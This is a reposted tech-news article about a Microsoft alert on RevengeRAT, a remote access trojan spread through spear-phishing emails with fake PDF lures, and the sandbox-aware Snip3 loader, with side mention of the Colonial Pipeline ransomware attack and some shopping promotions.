This new malware can steal your passwords and hijack your webcam – BGR | #microsoft | #hacking | #cybersecurity

Cybersecurity news has been dominated in recent days by the fallout from the Russian ransomware gang you’ve no doubt heard about by now, the one that hacked the IT network of a major US fuel pipeline and sent US national security officials scrambling. We will be reeling from the effects of this attack, one way or another, for a long time to come, while there is still a slew of additional new threats and cybersecurity news keeping security professionals on multiple fronts.

Microsoft in recent days sent out an alert about one such threat — a remote access tool called RevengeRAT that Microsoft appears to be targeting the aerospace and travel industries with spear-phishing emails. This particular threat is delivered via an email designed to fool the recipient into thinking it’s genuine and thus opening it, along with an attached Adobe PDF file that goes on to download a malicious file.

Today’s Top Deal Prime Day 2021 started early for the Fire TV Stick 4K — get one for just $29.99! List Price:$39.99 Price:$29.99 You Save:$10.00 (25%) Available from Amazon, BGR may receive a commission Buy NowCoupon Code: HELLOFTV Available from Amazon BGR may receive a commission

Microsoft goes on to explain that attackers use these kinds of remote access Trojans for everything from data theft to follow-on activity, as well as the delivery of additional attack payloads that are used for data exfiltration. “The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo,” explains Microsoft in a series of tweets about this threat. “An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.”

These kinds of Trojans steal content like user login credentials as well as webcam images, along with anything that the system clipboard has been used to copy. Another point to note, the malicious executable content at the center of this threat campaign is a loader called Snip3. Security firm Morphisec has also pointed out another feature of Snip3 — that if “the script is executed within Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments” and it identifies one of those virtual machine environments, the script terminates without loading the Trojan.

The method used to get this attack running, by the way, remains incredibly popular among hackers, partly because of how easy it is to trick at least one person within an organization or enterprise to click on a file from a dodgy email that has been dressed up to appear genuine. I’ve also read some unconfirmed reports that a sketchy email with a malicious file attached may have been what kicked off the Colonial Pipeline attack in recent days, which allowed the DarkSide ransomware gang to steal some 100GB of files from the pipeline company’s IT network and then lock that network down until a nearly $5 million ransom was paid.

Today’s Top Deal This iPhone case is thin and light but extra Tuff – now it’s at Amazon’s lowest price ever! Price:$15.99 Available from Amazon, BGR may receive a commission Buy Now Available from Amazon BGR may receive a commission

Original Source link

Leave a Reply

Your email address will not be published.

seventy seven + = eighty one